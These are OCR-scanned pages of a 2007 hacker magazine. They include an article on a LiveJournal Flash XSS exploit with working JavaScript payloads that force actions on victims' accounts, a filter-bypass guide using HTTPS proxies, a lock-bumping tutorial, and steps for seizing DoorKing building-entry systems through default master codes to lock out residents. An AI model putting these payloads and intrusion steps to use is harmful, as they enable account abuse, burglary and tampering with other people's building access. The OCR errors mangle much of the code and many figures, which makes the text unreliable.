its omnipresent sel f, can get these devices for
l ess or manufactu re them for l ess and tai l or
the technol ogy t o act as i t wishes. The cost
for an i mpl ant is around $20 for the tag and
the cost of i mpl antation which can vary from
one doctor to another. There is not a whol e
l ot stopping the government from doing this.
P
ge 10 2600 Magazine
E::-::t: 1 L 1
|J i t.r-I
by Zaphraud
This articl e wil l focus on a cl ickl ess SWF
XSS expl oit of LiveJournal .com and the
importance of:
- Learning from the past.
-Auditing al l errors to at l east determine
what caused them.
- Last but not l east, the u l timate form of
code auditing: Using your program whil e
intoxicated, to simul ate a " regu l ar" user.
As of 6-0ctober-2006 Livejour nal staff
cl osed this vu l nerabil ity in the video templ ate
system.
Recent Background
A few months ago, LiveJournal joined other
bl ogging sites in supporting video content for
its members. I nitial l y, the templ ate system
was used. Later, support was al so added
for simpl y pasting OBJ ECT-styl e code from
Yout ube or Photobucket. Focus here is on
the templ ate system, which works as fol l ows
using a URL pasted in from one of the two
al l owabl e services, YouTube or Photobucket:
<LJ TEMPLATE=NAME>http : //www.youtube .
"com/watch?v=d3PyLe6 s ivE</LJ-TEMPLATE>
The very first thing that crossed my mind
when I saw this was "Gee, I bet they are onl y
checking domain names." I proceeded to
post an entry on August 2nd featuring a s ma l l
Mozi l l a banner that I had upl oaded t o Photo
bucket for the purpose of testing this. The post
is at acpizza. l ivejour nal .com/499638.html
and uses the fol l owing snippet:
<lj -template name=''video''>http://img.
"phot
o
bucket . com/albums/v51 0/zaphraud/
"misc/mozilla . swf</lj -template>
On 1 3-September-2006, I discov-
"Funny / longcat. swf" </1 j -template>
I t didn't work and I edited it to fix it. Bear
in mind that I was dr u nk, so once I figured
out what I did wrong by l ooking at previous
exampl es, i s i t any s urprise that I ended up
with:
<lj -template name= ''video''>http://img.
"photobucket.com/albums/v51 0/zaphraud/
"Funny/longcat. swf "</lj-template>
after "fixing" the probl em? Notice I drunk- _
enl y l eft a quote at the end?
What happened next is key: I nstead of
proper l y breaking with the normal Live
Jour nal error when HTML is a l l screwed up
[Error : Irreparable invalid markup ( 'what
ever was bad ') in entry. Owner must fx
manually. Raw contents below.], I saw t he
word OBJ ECT on one side and a quote and
a

. on the ot her side, with a working video


in the middl e, presu mabl y from the EMBED
tag.
Yes, as it t ur ns out from viewing t he
sou rce, it was possibl e to pass parameters
to the fl ash. I nitial l y I pl ayed with this in the
fol l owing manner:
<lj -template name=''video' ' >http://img.
"photobucket.com/albums/v51 0/zaphraud/
"Funny/zeldazvO . swf"height=" 1 "width=" 1</
"lj -template>
Spaces in the URL are disal l owed.
However, by quoting parameters, separa
tion of arguments is preserved. This one pixel
"videO" is actual l y a hummed rendition of
the Zel da theme song, which as you can
imagine is quite capabl e of making peopl e
confused when i t ends up posted in a Live
Jour nal community, or a message comment,
as there is not rea l l y any way to tel l where
exact l y it came from short of viewing the
sou rce. At some point, a photobucket-hosted
meatspin.swf was posted to a community, but
a moderator del eted it rapidl y.
ered a hi l arious meme whil e dr unk and
posted another entry at acpizza. l ivejour nal .
com/S01 921 .html and made the mistake of
putting quotes around the URL, as fol l ows:
<lj -template name=''video''>''http : //img.
"photobucket.com/albums/v51 0/zaphraud/
Perhaps because of peopl e getting used
to MySpace profil es t hat are every bit as
Spring 2007Pge 1 1
annoyi ng as l ate 1 990s Geoci t i es web pages, abuse of t hi s funct i on went u nderreported.
Cl ear l y, somethi ng l arger was needed i n order to get th i s probl em fi xed. It was t i me to reopen
a can of Exxon Seal Remover . . . .
<lj-template name= ''video ''>http://img.photobucket.com/(some url).swf"height
-="l"width="l"AllowScriptAccess="always</lj-template>
The Al i owScri ptAccess tag al l ows javascr i pt to be r un from fl as h.
I downl oaded a tri al versi on of Fl as h 8 and struggl ed wi t h t hi s monster appl i cat i on's
awkward i nterface u nti l I fi gured out where I needed to drop my l oad, after whi ch it became
extremel y si mpl e.
getURL("javascript:document.write( '<form method=post name=esr2006
action=http://ww.livejournal.com/interests.bml><input type=hidden
name=mode value=add><input type=hidden name=intid value=456049><input
type=submit value=ESR></form>, );document.esr2006.submit();");
It basi cal l y uses a s i ngl e URL i n order to wri te a l i ttl e HTML form, then cl i ck on the submi t
button. Afer i t ran f or a coupl e of hours i n a popul ar but much di s l i ked commu nity, I shut i t
of and tri ed some other th i ngs.
Another person proved i t possi bl e to wri te a post i ng worm, i n spi te of L i veJ our nal 's separa
ti on of domai ns, because s i nce that ti me they have added another feat ure, l i vej our nal . com/
portal /, that shows "fr i end's ent ri es" on the mai n l i vej our nal si te whi ch made i t poss i bl e to use
j avascr i pt to mani pul ate the new post page, l ocated at l i vej ournal . com/update. bml . Thi s code
was never rel eased i nto t he wi l d, and was onl y tested i n a steri l i zed for m.
The fol l owi ng code was used by a trol l , apparent l y an obese orange cat, post i ng i n t he
" proanorexi a" commu ni ty:
getURL("javascript:document.write( '<html><body><script language=\
"JavaScript\"> function rUrl() { var cdate = 0; var sex = 0; targurl = new
Array(4); targurl[O] = \"Donut_Girl\"; targurl[l] = \"Ronders\"; targurl[2]
= \"Andikins\"; targurl[3] = \"Shay\"; var ran = 60/targurl.length; cdate
= new Date(); sex = cdate.getSeconds(); sex = Math.foor(sex/ran); return(\
''http://encyclopediadramatica.com/index.php/\ '' targurl[sex]); } function
popupMe(){myleft=lOO;mytop=lOO;settings=\"top=\" my top \",left=\"
myleft \",width=900,height=800,location=no,directories=no,menubar
=no,toolbar=no,status=no,scrollbars=yes,resizable=yes,fullscreen=yes\
";PopupWin=window.open(rUrl(),\"Popupwin\", settings);PopupWin.blur();}
</script><form method=post name=esr2006 action=http://www.livejournal.
com/interests.bml><input type=hidden name=mode value=add><input
type=hidden name=intid value=456049><input type=submit value=ESR></
form></body></html>, ); PopupMe(); document.esr2006.submit();");
Thi s is the fi nal known exampl e of t hi s expl oi t i n a funct i onal form, whi ch not onl y
made users i nterested i n Exxon Seal Remover, but then tri ggered an aggressi ve
popup of one of fou r fucked- up-peopl e pages from encycl opedi a dramati ca.
What can we l ear n from the past, wi th respect t o devel opment and secu r i ty? At fi rst gl ance,
i t wou l d appear that t hi s i s j ust a more advanced versi on of the same damn t hi ng that happened
wi th Exxon Seal Remover i n 2001 (see http: //www. l i vej ournal . com!tool s/memori es. bml ?user
=acpi zza&keyword=Exxon+Seal +Remover+bugfi x. ) where i mage tags weren' t bei ng properly
fi l tered and al l owed for mani pul at i on of the user's i nterests, or, i n the 2 1 -J anuary-20m entry,
to l aunch the user's mai l cl i ent wi t h a shocki ng message ( i t i n i t i a l l y sai d somethi ng el se).
On the other hand, one has to take i nto account rea l i ty, someth i ng we hackers often over
l ook. Whi l e onl y havi ng a day or two of si gn i fi cant downt i me i n the l ast hal f dozen years,
Li veJ our nal . com has been compl etel y overtaken i n popu l ari ty by the bug- r i dden Swiss cheese
that i s MySpace. com, and that's because MySpace. com used the same phi l osophy that Mi cro
soft has used in a l l thei r products ( and perhaps u nti l recent l y wi t h thei r OS): Get i t worki ng,
now. Fi x it when it breaks. I n a wor l d wi th no real corporate respons i bi l i ty, fi xi ng securi ty hol es
before they are expl oi ts or spendi ng t i me creat i ng qual i ty code i s a l osi ng busi ness model . That
saddens me deepl y, but that's an u nfortu nate real i ty.
Kudos to the 80S and the 602.
Page 12 2600 Magazine
Greetings from 30,000 feet, and wel come
to another acti on-packed epi sode of the
"Tel ecom I nformer! " I t ' s l ate February and
my l itt l e proj ect in Spencer, I owa j ust ended.
Thanks to the money I made, I'm wingi ng
my way over t he Tasman Sea - on an Ai r
New Zeal and fl ight between Wel l i ngton and
Mel bourne, Austral i a!
So what was happeni ng i n Spencer? Fun
stuff! Too bad i t's over. I f you're a regu l ar
reader of my arti cl es, you ' ve probabl y heard
of access charges and the Uni versal Servi ce
Fund, aka USF. If not, here' s a quick refresher:
l ong di stance cal l s have several chargeabl e
components, which are bu i l t into the few
cents per mi nute (or l ess) you pay to your l ong
di stance carri er.
When you make a l ong di stance cal l , your
l ocal exchange carrier ( LEe) del i vers the cal l
to your l ong distance carri er at the tandem. For
t hi s, they charge a sma l l fee to the long di stance
carri er, usual l y a fraction of a cent per mi nute.
Your l ong distance carri er takes the cal l over
thei r network to the nearest tandem switch to
the cal l desti nati on, where a termi nati on fee i s
pai d t o t he LEC on t he other end. Thi s i s usual l y
al so onl y a fraction of a cent per minute, but
in certai n high cost rural areas, i t can be over
ten cents per minute. These charges are cal l ed
"access charges" and they' re the reason why
l ong di stance cal l s cost money and I nternet
onl y VolP cal l s are free.
For a l ong ti me, carriers such as I nterna
ti onal Tel ecom Ltd. (based i n Seatt l e, WA)
have taken advantage CI access charges by
host i ng free conference bridges, chat l ines,
and other servi ces - anythi ng that generates a
l ot of i nbound traffi c. You can get free unified
messaging from k7. net, free tel econferences
from mrconference. com, and even free dial
up I nternet service from nocharge. com ( in the
Seatt l e and Boston areas) . Free i nternational
cal l s, however, hadn' t been offered unt i l
someone got a l itt l e creati ve in Spencer, I owa.
Why Spencer? I t's l ocated i n the remote
I owa Great Lakes regi on. I t ' s very expensive
to provide l ocal service to t hi s r ural area and
access charges are, as you mi ght imagi ne,
correspondi ngl y high. However, t hanks to
USF grants Spencer has pl enty of fast I nternet
connecti vi ty. VolP termi nati on to many foreign
countri es, meanwhi l e, is i ncredibl y cheap, so
l ong as you ' re termi nati ng to l and l i nes. So you
can probabl y see where this is goi ng. A s i mpl e
game of arbi trage! Cal l near l y anywhere i n the
devel oped worl d (wel l , l and l i nes i n about 40
countries actual l y) for onl y the cost of a phone
cal l to I owa! Effecti vel y, i f you had a cel l ul ar
pl an offer i ng u n l i mited n i ght and weekend
mi nutes, you coul d make unl imi ted off-peak
international cal l s. And done right, anyone
offer i ng thi s servi ce coul d make a hal f cent per
mi nute or more, spl itting revenues wi th a l ocal
partner in Spencer.
Wel l , the impl ementation worked beauti
fu l l y. The soft PBXs handl ing the cal l s were
l ean, mean, moneymaki ng machines. Unfor
tunatel y, I hear this real l y ti cked off the l ong
di stance carri ers. Rumor has it they started
putt i ng pressure on NECA, the FCC, and
anyone who wou l d l isten. Presumabl y under
the mounti ng pressure of l egal threats, our
partner in I owa pul l ed the rug out from under
us. I t was fun whi l e it l asted though, because
prank cal l ing random peopl e i n Hong Kong at
two in the morni ng was a l ot more i nteresting
than most of the cal l s that pass t hrough my
central office.
After the past coupl e of months' craziness
(we were terminati ng over 1 0, 000 minutes per
hour to Chi na al one), I needed a break - at
l east unt i l I can dream up a better i dea. So I
took the opport unity to visit the l ovel y south
i sl and of New Zeal and. Of course, I checked
out the tel ecommuni cati ons l andscape as
wel l as the gl aciers, mountai ns, and beaches.
New Zeal and tel ecom i s in transiti on, in some
areas more l i beral i zed than others but rapidl y
modernizi ng nonethel ess.
Cel l ul ar services are the unexpected dino
saurs - sti l l a duopol y, as was the case fi ve
years ago on my l ast vi si t . Vodafone operates
GSM wi th EDGE and GPRS data service and
Tel ecom NZ operates COMA ( 3G 1 xEV- DO
Spring
2007Pge 13
servi ce is ofered i n major metropol i tan areas,
but smal l out l yi ng areas sti l l have onl y I S-95
coverage - not even 1 xRTT) . Wirel ess servi ce
is i nsanel y expensi ve by U. 5. standards.
I ncomi ng cal l s are bi l l ed on a "cal l er pays"
basi s. Cel l u l ar phones are al l i n speci al area
codes in the 02x seri es and it' s outrageousl y
expensi ve t o cal l anythi ng i n these area codes.
You can l i teral l y set up a three-way cal l from
a l and l i ne between Chi na, New Zeal and,
and the U. 5. for l ess than one third the cost
of making a l ocal cal l to a mobi l e phone i n
Auckl and. (For exampl e, from a payphone
l ocal cal l s to a mobi l e phone cost NZ$ 1 .20
per mi nute. )
When I l ast visited, Tel ecom NZ was
beginning to offer DSL services. A 64Kbps/
1 28Kbps l i ne wi th metered bandwidth started
at about NZ$70 per month, and the pri ce
went up sharpl y dependi ng upon how much
data you transferred. Competi ti on has, fortu
natel y, driven prices down. New Zeal and has
adopted a simi l ar regul atory approach as the
U. S. , unbundl ing the DSL and I nternet compo
nents. It has worked and broadband pri ces are
fai r l y reasonabl e; 1 28Kbps/4096Kbps servi ce
r uns about NZ$50 per month. However, there
is a vague "fair use pol i cy" attached to these
pl ans. Basi cal l y, if you run peer-to-peer appl i
cations, bad th i ngs wil l happen ( such as throt
tl i ng, traffic shapi ng, and other QoS measures) .
From most providers, for about NZ$ 1 20 per
month, you can get 200GB of transfer that i s
not subj ect to the same QoS restri cti ons.
Wi Fi is begi nni ng to pop up i n more
pl aces, al though it ' s not near l y as common
as i n North America. Unfort unatel y, Ki wi s try
to charge for i t near l y everywhere the servi ce
is avai l abl e to the publ i c - usual l y at outra
geous rates and wi th heavy fi l teri ng. I sought
out unsecured access poi nts i nstead - SSI D of
L 1 NKSYS, anyone?
Wh i l e my CDMA handset was abl e to roam
i n New Zeal and, the cost of doi ng so was
$2. 1 9 per mi nute - prohi bi ti vel y expensive for
al l but bi l l i onaires. I opted to l et cal l s go to
voi ce mail instead, and I was pl eased to see
that Cal l er ID and i ncomi ng SMS were del i v
ered correctl y. Pyphones were a much more
economical means of communicati ng. Unfor
tunatel y, there i sn ' t any one best way to make
a cal l from a payphone i n New Zeal and, so
thi s requi red some research and creativi ty.
The easi est way to ca l l from a payphone
i s to buy a Tel ecom NZ prepai d cal l ing card.
I n fact, if you ' re cal l ing anythi ng other than
a tol l -free number, it ' s the onl y way to make
cal l s from a payphone. I didn' t see H singl e
payphone on the enti re south i sl and that
accepted coi ns. Unfortunatel y, usi ng Tel ecom
NZ i s al so one of the most expensive ways to
cal l from a payphone, and i s onl y pract i cal
for l ocal cal l s (wh i ch are unt i med and cost
NZ$0. 70).
Tel ecom NZ prepai d cal l i ng cards are sol d
at nearl y every retai I outl et . They have smart
cards on them, and work simi l ar l y to the
QuorTech Mi l l enni um stored val ue smart cards
(stil l avail abl e from Bel l Canada, al though most
other LECs in North Ameri ca have given up on
them). You stick it in the sl ot, the remaining
val ue is displ ayed on the consol e, you dial ,
and t he diminishing val ue i s refreshed each
minute as your cal l progresses.
Usi ng a prepaid cal l ing card purchased
in the U. s. is another option. Costco sel l s an
MCI cal l ing card that can be used for inter
national origination. However, the rates are
about US$0. 35 per minute for cal l s back to
the U. S. , and are nearl y US$l per minute for
cal l s withi n New Zeal and. Whil e sometimes
good for short (one to two minute) cal l s from
payphones, i t was proh i biti vel y expensi ve to
use these for l ong cal l s. The tol l -free country
direct numbers i n New Zeal and are 000-91 2
for MCI , 000-91 3 for AT&T, and 000-999 for
Spri nt. These numbers can be used for maki ng
col l ect cal l s, and al l of the carri ers wil l transfer
you to thei r respecti ve busi ness offi ces as
wel l ( si nce Veri zon owns MCI now, MCI can
t ransfer you to Veri zon Wi rel ess customer
servi ce - handy i f you ' re havi ng troubl e wi th
your i nternat i onal roami ng servi ce) .
Fi nal l y, there is a burgeoni ng i ndustry i n
third party VolP -based prepai d cal l ing cards,
wi th rates at about NZ$0. 04 per mi nute.
Of course, there' s a catch: you have to di al
through a l ocal gateway and, bei ng VolP,
the qual i ty can somet i mes be i nconsi stent.
I ended up carryi ng two cal l i ng cards - one
Tel ecom NZ card used to connect to the l ocal
gateway and a separate prepai d cal l i ng card
to cal l from there to my fi nal dest i nat i on. You
can make mul t i pl e consecutive cal l s wi thout
redial i ng the gateway number, whi ch means
you onl y pay Tel ecom NZ for one cal l . I used
a GoTal k card, wh i ch offered excel l ent cal l
qual ity and had l ocal access numbers near l y
everywhere i n New Zeal and.
Wel l , t he captain informs me t hat i t ' s time
to put away portabl e el ectroni c devi ces, so
it ' s time to bring this i ssue of the "Tel ecom
I nformer" - and my l aptop - to a cl ose. Next
stop, the l and of kangaroos, wal l abi es, and
Tel stra!
Page 1 4 2600 Magazine
0llf
by Major Lump
MajorLump@hotmail.com
"Yes, no, maybe so, " goes the chil dhood
phrase. My friends and I took great del ight
in endl essl y repeating what we thought was
such a cl ever l itt l e rhyme. For the hacker,
however, this phrase rings particul arl y true.
System administrators often think in terms of
bl ack and white (the "yes" and "no") whil e the
hacker sees shades of gray (the " maybe so").
The average computer user often assumes he
cannot outsmart or outthink the trained profes
sional . When stacking the teenage power user
against the professional system administrator,
it wou l d seem the administrator wou l d have
the advantage. Not so. The gray scal e al ways
defeats the bl ack and white.
I was recent l y surfing the Internet at my
school when I decided to pay a visit to 2600.
com. I typed in the URL, pressed enter, and
waited for the page. Rather than the green
2600 l ogo, a bl ue "Websense" l ogo stared
me in the face. It turned out that al l hacking
rel ated websites are bl ocked, as wel l as other
"inappropriate" material . Since I attend a
rather l iberal , prestigious prep school (no, I ' m
not a snob), I was surprised that the system
administrator governed with such an iron fist.
Surel y a school that encourages freedom of
speech wou l d not use a content bl ocker and
t hus stoop to the l evel of many foreign govern
ments (the ones we shun). I knew I needed to
find a sol ution to the probl em and regain my
freedom.
Googl e, as many hackers know, is a
great information miner. I quickl y directed
my browser to Googl e and searched under
" hacking websense". The tenth hit (Security
ForumX - A workaround to Websense) did the
trick. Nicel y outl ined in front of me was a hack
for avoiding the watchfu l eye of Websense. I
l earned, from reading the articl e, that the
Websense fil ter does not monitor https connec
tions (which use the SSL protocol ) . I am not
sure exactl y why but I suspect that it is either
due to the encryption ( SSL) or the protocol
( SSL uses port 44 rather than port 80). Either
way, a user can access a proxy t hrough an
https connection and t hus l iberate their web
browsing habits. Afer trying a few proxies,
my favorite was https: Ilwww.proxyweb.
-net, but others incl ude MegaProxy Proxify
(https: Ilmegaproxy. com) and Proxify
(https: Ilwww.proxify.com). For a l ist of
great proxies and other goodies visit http: II
-www.proxyway.com/www/free
proxy-server-list.html, http://
-tools.rosinstrument.com/proxy/,
or just Googl e for it (" free proxies
https" wil l do the trick).
There is another hack or workaround
for extracting information that is bl ocked by
a fil ter. After outl ining the proxy hack, the
fol l owing concept seems a l itt l e quaint. But if
the https/SSL proxy does not work, this primi
tive hack can be an effective l ast resort. I f you
want to get a smal l fact or a tidbit of informa
tion from a specific, bl ocked website, you
can use Googl e' s " site: " operator to search the
website. After retrieving the resu l ts, Googl e
incl udes two l ines of text under the l ink to
each hit. Normal l y, these tidbits of informa
tion woul d be bl ocked since they originate
from a bl ocked website. However, Googl e' s
resul ts can stil l paraphrase smal l sections (two
l ines) of the target site. The more specific your
search terms, t he more pertinent t he informa
tion returned. For exampl e, l et's say I woul d
l ike t o find t he email address of 2600.com' s
web master. Normal l y you woul d go t o 2600.
com to get this information, but seeing that I
am on a fil tered network, the site is bl ocked.
However, I can Googl e this search term:
"site:2600.com email webmaster"
and the second hit gives me the email address:
webmaster@2600.com. This hack' s major
stumbl ing bl ock is, of course, that onl y
smal l tidbits of information can be retrieved.
However, in dire situations this workaround
can be a l ifesaver.
Since network fil tering is a major issue and
affects peopl e al l over the worl d, there is a
pl ethora of onl ine resources discussing hacks
and workarounds. lfyou're interested in l earning
more I suggest that you visit http://ww
-zensur.freerk.com, http://peter
-rost.blogspot.com/200/01/top-
-ten-methods-to-access-blocked.
-html, orhttp://www.webstuffscan.
-com/2006/11/23/how-to-access-
-blocked-websites-top-lO.Ofcourse,
Googl e is another great resource. J ust Googl e
"accessing blocked websi tes" and
Spring 2007Pa
g
e 15
you shou l d have more h i ts than you know
what to do wi th. Before I end, I woul d l i ke to
j ust make one l ast comment. Maj or props go
to Googl e for thei r Googl e Docs and Spread
sheets. I wrote thi s art i cl e on thei r onl i ne text
edi tor and found that i t i s both easy to use and
great for wri ti ng "controversi al " art i cl es that
can' t wander i nto the wrong hands ( namel y
my school 's system admi ni strator) . I t ' s a hack
er's best fri end.
Hacki ng Your
Own Fran
by Clif
The onl y reason I want 2600- l and to know
the fol l owi ng i s to i ncrease your own secur i ty.
I 've del i bCrated l ong and hard, and as t hi s
i nformati on i s publ i c domai n anyway and i s
currentl y i n use by t he "bad guys," I trust you
wi l l not use it for bad purposes. Rather, usi ng
t hi s knowl edge mal i ci ousl y i s wrong, stupi d,
and i l l egal i n practi cal l y every country and
communi ty i n the wor l d. Use i t i nstead to l ook
around your home, work, and possessi ons
and deci de what addi t i onal measures ( al so
di scussed) you wi sh to take.
Yal e i s a company that makes l ocks
- pr i mar i l y the l atch-styl e l ocks, but al so
padl ocks, etc. Un i on al so make l ocks wi th
l atch-styl e keys. You may have seen some at
work or on your pati o doors. I n fact, l atch
styl e key l ocks are everywhere. Someti mes
they're connCcted to morti se bol ts, someti mes
to padl ocks, somet i mes to l atch l ocks, and al l
of them can be opened by an amateur i n l ess
than two seconds. Back up. read that agai n.
I can open your front door i n two seconds.
l eavi ng no t race, no force, then go to your
nei ghbor and do the same agai n. And agai n.
So fast that I don't even l ook suspi ci ous. I have
a skel eton key. I ' m goi ng to tel l you how to
make one.
Fi rst, the sci ence bi t . . . qui ck - to the pool
tabl e! I f you have several ba l l s touchi ng i n a
l i ne and you fi re the cue bal l at one end of
the l i ne, t
h
e bal l at the other end shoots away.
If you have never tri ed thi s, it is the core of at
l east hal f of al l "tri ck-shots." ( Be a l i tt l e creati ve
and you've now got a si deshow act as wel l as a
skel eton key - t hi s is a good val ue arti cl el )
The bi t t o take away i s that t he energy i s
transferred t hrough t he chai n and moves the
end bal l . The same pri nci pl e i s i nvol ved i n thi s
techn i que but you need t o understand l ocks to
see how t hi s is useful .
Locks have a number of pi ns ( around
five for a house key) t hat are spl i t i n one of
( usual l y ni ne) posi t i ons al ong thei r l ength
wh i ch are spri ng-l oaded to i nterrupt t he rota
ti on of the mechani sm (see di agram !a and
1 b for a s i mpl i fi ed l ook) . I nserti ng the ( ri ght ! )
key i n t he l ock pushes al l t he pi ns s o thei r
spl i ts come i nto l i ne wi t h t he barrel of the
mechani sm, al l owi ng i t to t ur n. I nsert i ng the
wrong key l eaves the pi ns sti l i mi sal i gned so
the lock won' t t ur n. A very s i mpl e mechani sm
but pure geni us when you consi der i t , gi ving
5A9 combi nati ons * 59, 049 di fferent uni que
combi nati ons of keys and l ocks for five pi ns
wi th n i ne posi t i ons.
Al as, physi cs has rendered every s i ngl e one
of those 59, 049 l ocks openabl e wi th one key,
pl us a l i ttl e bump of energy. Because of t hi s.
these skel eton keys ar e cal l ed "bump" keys '
As wi th the pool bal l s, i f you can i nt roduce
suffi ci ent energy to one end of the bal l chai n
( or i n th i s case, one hal f of the l ock pi n), the
other end jumps away to absorb the energy (or,
i n thi s case, the top hal f of the pi n jumps out
the way, al l owi ng the l ock to t urn) . We do th i s
wi t h a bump key. A bump key i s a regul ar key
cut down to the l owest sett i ng (see di agrams
Zafor a normal key ( my house key, i n fact) ,d
2 b ( t he bump key) ) . You can do
'
thi s yoursel f
wi th a smal l fi l e. I f i t takes you more t han 20
mi nutes, real l y, you're tryi ng too hard!
Make s ure you get ni ce smooth sl opes on
the bump key - otherwi se you may make H key
that wi l l go i nto a l ock but not come out agai n.
Very embarrassi ng when you have t o expl ai n
t o t he wi fe/l ocksmi th !
However, the funni l y-shiped key al one
wi l l not open al l doors . . . you need some bump
too, to j ump al l the top parts of the pi ns ind
al l ow the barrel to t ur n. Thi s i s the l ow-tech bi t
Page 1 6 2600 Magazine
Pi n i n cl osed
posi ti on
of the show - the back-end of a screwdri ver i s
perfect. I n order to pass the energy to the pi ns,
you need to i nsert your new key, but then pull
it out with U click - t hi s is essent i al . Next, appl y
a sma l l amount of torque to the key - not a
huge amount, j ust enough (thi s wi l l come wi th
pract i ce) . Fi nal l y, hi t the top of the bump key
wi th enough force to crack and maybe damage
the i nsi des of a hard-boi l ed egg.
If i t's worked, you can twi st the key i n the
di recti on of the torque you appl i ed. I f not, pul l
the key out one cl i ck agai n and try once more.
I f you sti l l can't get i t to work, you may be
hi tti ng too soft, have cut your key too crudel y
( al though i t's very tol erant), or be appl yi ng too
much or too l i ttl e torque. Experi ment a bi t !
So now you have a skel eton key for every
lock the key wi l l fit. Back up a second. One
key and 20 mi nutes of work j ust got you access
to a l l 59, 049 formati ons of that l ock. Bl i mey.
And don't i magi ne a $1 00 l ock is better than a
$1 0 one - they're al l the same. And padl ocks
too - i f you can get a key to fi t the l ock ( i . e. , i t
i s the ri ght si ze and has the ri ght gati ng), you
can open every i nstance of that l ock. Doubl e
Bl i mey.
Let's consi der the i mpl i cati ons of t hi s a
second. Say you l i ve i n a student dorm bui l di ng
where each room has a key on the same l ock
s ui te ( same shaped keys). Wi th i n 'U mi nutes
of movi ng i n, the guy next door cou l d have a
key to every room i n the bui l di ng, i ncl udi ng
the security offi ce! In a dorm bui l di ng you
cannot fit your own l ocks to the doors - you
may as wel l l eave the door open i n fact. Is that
a padl ock on the secur i ty barri er at the car
park? Sudden l y you see i t as unl ocked - there
to l et yoursel f i nto.
So now you're hopefu l l y i nformed and
worri ed, and wonderi ng how you can protect
yoursel f and your property. Good. Knowl edge
is power, and now you know as much as the
peopl e who want to steal your thi ngs . Have a
l ook at what l ocks you have and what you're
Outer
DDC|
protecti ng wi th those l ocks. There are several
t hi ngs you can do to i mprove your secur i ty.
1 ) Fi t an el ectroni c system ( Expensi ve, but
what fun ! Thi s i s the excuse you've al ways
wanted. ) wi th card access, ret i na scans, RFI D
reader, etc. , etc.
2) Fi t "Chubb" styl e l ocks i n addi ti on to
l atch l ocks. They are the ones whi ch j ust show
a keyhol e t hrough the door on the outsi de.
Th i eves have no way of knowi ng exactl y
what's behi nd t he hol e, so pi cki ng i s harder
work ( i nexpensi ve, but heavy to carry).
3) Regu l ar bol ts are a great addi ti on once
you're on the i nsi de.
4) Get a bi g dog and al arms, etc. - deter
rent factor!
But u l t i matel y, i f someone wants to break
i nto your home, they wi l l . We can ei ther i sol ate
oursel ves through fear i nto l os i ng communi ty,
or we can rea l l y get to know our nei ghbors
and al l keep our eyes out for one another.
And as we come to know and trust our
nei ghbors, we get to bu i l d somethi ng far more
val uabl e than materi al goods are worth anyway
- a feel i ng of secur i ty as wel l as a physi cal l y
more secure nei ghborhood. Whi ch worl d do
you want to l i ve i n? You can make it happen.
You start smal l wi th your own nei ghbors, your
own corri dor, and encourage i t to spread. We
can get our nei ghborhoods back.
Spring 2007Pge 1 7
orktng
th
by Cadet Crusher
I f you l i ve i n a newer or renovated apart
ment bui l di ng, chances are there is a tel e
phone entry system that control s visitors '
access to the bui l ding, and chances are it' s
of the Door King brand. I have one of these
devi ces control l i ng access to my bui l ding and
i t occurred t o me one day short l y after moving
in to i nvesti gate the secur i ty of such an access
control system after one of my friends used
it to enter my bui l di ng. What pi qued my
i nterest was the fact that the phone number
of the Door King showed up on my Cal l er 1 0.
So I cal l ed it back. I ts response was merel y a
short beep fol l owed by s i l ence, i ndicati ng to
me that it was awaiti ng instructi on. In order
to confi rm this assumpt i on, I downl oaded
the operating manual , conveni ent l y l ocated
at http : //ww . dkacces s. com/English/Tele
"phone _Entry /1 8 35-0 65-F-8-05. pdf , wh ich
covers model s 1833, 1834, 183 S, and 183 7
( fi gur i ng out what model your bui l di ng has
is fai r l y t rivial , j ust match you r menta l (or
digi tal ) pictu re of your bu i l ding' s model with
one on the DoorKi ng websi te (ww . doorking.
comI ) . I ndeed it was awai ti ng command.
Basics of Programmi ng Door
Ki ng Telephone Entry Systems
Before we begin, a standard discl ai mer is
in order: I provi de thi s i nformati on for educa
ti ona l purposes and am not respons i bl e for
what any i ndi vidual may do wi th i t.
The most i mportant t hi ng to note i s that
all of the fol l owing programmi ng steps must
be executed on the box ' s keypad. Dial -in
programming access i s onl y s upported via
the Door Ki ng Remote Account Manager
soft ware ( whi ch I haven' t had t he oppor
tu n i ty to exam i ne yet - more on t hat in the
futu re) . Another point to note is t hat t he box
wi l l gi ve you feedback as you give i t i nstruc
ti ons, a short beep wi l l be emi tted after each
successfu l program step, and a l ong beep
( beeeeeeep, as the manual states) wi l l s i gnal
end of programmi ng. Last l y, you wi l l need
tbe master code for t he box. Convenient l y
for us t be factory code i s 9999. I f t he master
code has been changed I suggest trying 1234,
Page 18
1111 - 8888, or the bu i l ding' s address ( I
have a feel ing you ' l l be i n l uck) . One more
thi ng: wben you see somethi ng l ike *07 in the
s teps bel ow, that means press * then 0 then 7
unl ess otherwi se stated. Good, now we can
get to the fun st urr.
Setting Tone/ Pulse Di al i ng
Th i s is the easiest th i ng to make the box
do ( as wel l as quite humorous) . J ust fol l ow
these steps:
1) Di al *07 t hen the master code.
2) Dial 0* for tone dial i ng or 1 * for pul se
dial ing.
3) Press 0 and # together to end t he
programmi ng cycl e.
I t ' s t hat easy! Now you can watch every
one' s befuddl ed l ooks as they wai t for the box
to dial usi ng pul ses.
Changi ng Tone Open Codes
Tone open codes are what the cal l ed party
(the res i dent) must di al from hi s or her phone
to unl ock the door for the guest. From t he
manual :
1) Dial *05 then the master code.
2) Dial 0*, 1 *, or 2* to desi gnate wh i ch
rel ay you wish to program. Most l i kel y it i s
Rel ay 0 or U Each box can control three
doors/gates, one per rel ay.
3 ) Dial the new tone open code. This wi l l
be fou r di gits. I f you want t o make i t one di gi t,
l i ke 9, then vou wou l d dial 9# # # . Each # is a
bl ank digi t.
T
he defau l ts are Rel ay 0 # # # # ,
Rel ay1 9876, Rel ay 2 = S432.
4) Press 0 and # together t o end the
programmi ng cycl e.
I shou l d menti on what Rel ays 0- 2 a re. The
box has three rel ays, one rel ay can control
one door/gate. We are most interested i n
Rel ay 0 as i t i s the primary rel ay and most
l ikel y the one control l ing the door/gate we
wi sh to command. Now onl y you wil l know
the proper tone open code, so everyone el se
wil l have to get up off the couch to l et their
vi si tors in.
Other Capabilities
Programming the box from the keypad
al l ows for a pl ethora of mi schi ef to be done.
Here are j ust a f ew th i ngs possibl e changing
2600 Magazine
fou r di gi t entry codes, sett i ng the wel come
message, sett i ng the door open t i me ( how
l ong the rel ay wi l l keep the door unl ocked
afer access is granted), erasi ng the ent i re
di rectory, and, by far the most unsett l i ng,
reverse l ookups of di rectory codes to resi
dent phone numbers. Al l of these funct i ons
and more can found i n the manual ( refer t o
the URL above) . Pl ease use di scret i on when
